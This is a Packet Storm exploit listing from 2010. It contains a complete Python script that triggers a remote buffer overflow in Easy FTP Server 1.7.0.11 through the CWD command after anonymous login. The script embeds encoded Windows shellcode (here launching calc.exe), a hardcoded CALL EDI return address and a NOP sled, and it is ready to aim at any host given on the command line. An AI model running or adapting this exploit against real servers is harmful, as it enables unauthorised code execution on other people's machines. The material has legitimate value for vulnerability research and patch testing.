Easy FTP Server 1.7.0.11 CWD Buffer Overflow

2010-07-18T00:00:00
ID PACKETSTORM:91940
Type packetstorm
Reporter fdisk
Modified 2010-07-18T00:00:00

Description

                                        
                                            `# Exploit Title: Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit (Post Auth)  
# Date: 2010-07-18  
# Author: fdisk  
# Software Link:  
# Version: 1.7.0.11  
# Tested on: Windows XP SP3 en  
# CVE:  
  
import socket  
import sys  
  
buffersize = 268  
  
# windows/exec - 227 bytes x86/shikata_ga_nai EXITFUNC=process, CMD=calc.exe  
shellcode = ("\xb8\xf1\x18\xc7\x71\xd9\xc7\x29\xc9\xb1\x33\xd9\x74\x24\xf4"  
"\x5b\x31\x43\x12\x83\xeb\xfc\x03\xb2\x16\x25\x84\xc8\xcf\x20"  
"\x67\x30\x10\x53\xe1\xd5\x21\x41\x95\x9e\x10\x55\xdd\xf2\x98"  
"\x1e\xb3\xe6\x2b\x52\x1c\x09\x9b\xd9\x7a\x24\x1c\xec\x42\xea"  
"\xde\x6e\x3f\xf0\x32\x51\x7e\x3b\x47\x90\x47\x21\xa8\xc0\x10"  
"\x2e\x1b\xf5\x15\x72\xa0\xf4\xf9\xf9\x98\x8e\x7c\x3d\x6c\x25"  
"\x7e\x6d\xdd\x32\xc8\x95\x55\x1c\xe9\xa4\xba\x7e\xd5\xef\xb7"  
"\xb5\xad\xee\x11\x84\x4e\xc1\x5d\x4b\x71\xee\x53\x95\xb5\xc8"  
"\x8b\xe0\xcd\x2b\x31\xf3\x15\x56\xed\x76\x88\xf0\x66\x20\x68"  
"\x01\xaa\xb7\xfb\x0d\x07\xb3\xa4\x11\x96\x10\xdf\x2d\x13\x97"  
"\x30\xa4\x67\xbc\x94\xed\x3c\xdd\x8d\x4b\x92\xe2\xce\x33\x4b"  
"\x47\x84\xd1\x98\xf1\xc7\xbf\x5f\x73\x72\x86\x60\x8b\x7d\xa8"  
"\x08\xba\xf6\x27\x4e\x43\xdd\x0c\xa0\x09\x7c\x24\x29\xd4\x14"  
"\x75\x34\xe7\xc2\xb9\x41\x64\xe7\x41\xb6\x74\x82\x44\xf2\x32"  
"\x7e\x34\x6b\xd7\x80\xeb\x8c\xf2\xe2\x6a\x1f\x9e\xca\x09\xa7"  
"\x05\x13")  
  
eip = "\x91\xC8\x41\x7E" # CALL EDI - user32.dll  
nopsled = "\x90" * 16  
  
payload = "\x90" * (buffersize-(len(nopsled)+len(shellcode)))  
  
def ExploitEasyFTP(target):  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
connect = s.connect((target, 21))  
s.recv(1024)  
s.send('User anonymous\r\n')  
s.recv(1024)  
s.send('PASS anonymous\r\n')  
s.send('CWD '+nopsled+shellcode+payload+eip+'\r\n')  
s.recv(1024)  
s.send('QUIT ftp\r\n')  
s.close()  
  
target = sys.argv[1]  
  
ExploitEasyFTP(target)  
  
`